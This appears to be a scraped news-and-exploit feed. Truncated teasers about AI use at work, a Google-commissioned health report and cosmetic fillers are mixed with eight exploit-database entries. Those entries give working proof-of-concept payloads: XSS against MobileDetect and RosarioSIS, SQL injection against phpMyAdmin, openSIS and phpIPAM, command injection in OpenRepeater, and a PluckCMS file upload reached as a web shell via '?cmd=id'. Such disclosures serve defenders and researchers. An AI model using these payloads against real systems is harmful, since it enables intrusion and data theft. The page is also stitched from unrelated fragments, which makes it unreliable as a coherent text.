One in six employees say they lie about using AI to meet workplace expectations
One in six US workers say they lie about using AI to meet job expectations…
# Exploit Title: MobileDetect 2.8.31 – Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/serbanghita/Mobile-Detect/ # Software Link: https://github.com/serbanghita/Mobile-Detect/ # Version: 4da80e5 # Tested on: Windows # CVE : CVE-2018-25080 Proof Of Concept: GET http://mobiledetect/examples/session_example.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E Steps to Reproduce 1. Login as an admin user. 2. Send the request. …
At the European Health Summit in Brussels, Greg Corrado, Distinguished Scientist at Google, released a new report authored by Implement Consulting Group and commissioned by Google revealing that AI is reversing the long-term trend of slowing scientific productivity, providing a turning point for a European healthcare system grappling with rising costs and workforce shortages. The…
# Exploit Title: phpIPAM 1.4 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.4 # Tested on: Windows # CVE : CVE-2019-16693 Proof Of Concept # Ensure you have a valid user session before executing the PoC. POST /app/admin/custom-fields/order.php…
# Exploit Title: OpenRepeater 2.1 – OS Command Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/OpenRepeater/openrepeater # Software Link: https://github.com/OpenRepeater/openrepeater # Version: 2.1 # Tested on: Ubuntu # CVE : CVE-2019-25024 Proof Of Concept # PoC for OS Command Injection in OpenRepeater before version 2.2 #…
# Exploit Title: phpMyAdmin 5.0.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/ # Software Link: https://github.com/phpmyadmin/phpmyadmin/ # Version: 5.0.0 # Tested on: Windows # CVE : CVE-2020-5504 Proof Of Concept GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20–%20 HTTP/1.1 Host: phpmyadmin Connection: close # Additional conditions: # – The attacker…
# Exploit Title: RosarioSIS 6.7.2 – Cross Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis # Software Link: https://gitlab.com/francoisjacquet/rosariosis # Version: 6.7.2 # Tested on: Windows # CVE : CVE-2020-15716 Proof Of Concept http://rosariosis/Modules.php?modname=Users/Preferences.php&tab=%22%20onmouseover%3Dalert%281%29%20x%3D%22 **Conditions**: 1. User must be authenticated (as shown by the session…
Michelle Roberts, Digital health editor. People who have cosmetic filler injections in their face should be warned of the risk of a dangerous complication involving blocked arteries that can lead to skin loss and even blindness due to damaged blood flow, say experts. Researchers used ultrasound to study 100 cases of filler injections that…
# Exploit Title: PluckCMS 4.7.10 – Unrestricted File Upload # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/pluck-cms/pluck/ # Software Link: https://github.com/pluck-cms/pluck/ # Version: 4.7.10 # Tested on: Windows # CVE : CVE-2020-20969 Proof Of Concept GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1 Host: pluck Cookie: PHPSESSID=[valid_session_id] **Access Method:** http://pluck/files/exploit_copy.php?cmd=id **Additional…
# Exploit Title: RosarioSIS 6.7.2 – Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis # Software Link: https://gitlab.com/francoisjacquet/rosariosis # Version: 6.7.2 # Tested on: Windows # CVE : CVE-2020-15718 Proof Of Concept http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=” onmouseover=”alert(1)” Steps to Reproduce Log in as an admin user. Send the request. …
# Exploit Title: openSIS Community Edition 8.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/OS4ED/openSIS-Classic # Software Link: https://github.com/OS4ED/openSIS-Classic # Version: 8.0 # Tested on: Windows # CVE : CVE-2021-40617 Proof Of Concept GET /ForgotPassUserName.php?used_for=username&u=test%27%20OR%20%271%27%3D%271&user_type=student HTTP/1.1 Host: opensis Connection: close Steps to…